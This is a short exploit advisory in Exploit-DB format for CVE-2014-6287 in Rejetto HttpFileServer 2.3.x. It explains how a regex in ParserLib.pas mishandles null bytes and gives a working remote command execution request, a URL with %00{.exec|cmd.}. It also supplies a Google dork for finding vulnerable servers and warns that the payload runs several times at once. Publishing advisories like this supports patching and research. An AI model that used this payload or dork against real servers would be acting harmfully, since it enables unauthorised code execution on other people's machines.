# Exploit Title: HttpFileServer 2.3.x Remote Command Execution# Google Dork: intext:"httpfileserver 2.3"# Date: 11-09-2014# Remote: Yes# Exploit Author: Daniele Linguaglossa# Vendor Homepage: http://rejetto.com/# Software Link: http://sourceforge.net/projects/hfs/# Version: 2.3.x# Tested on: Windows Server 2008 , Windows 8, Windows 7# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;begin result:=reMatch(s,'\{[.:]|[.:]\}|\|','m!', ofs)end;
it will not handle null byte so a request to
http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.## EDB Note: This vulnerability will run the payload multiple times simultaneously. ## Make sure to take this into consideration when crafting your payload (and/or listener).
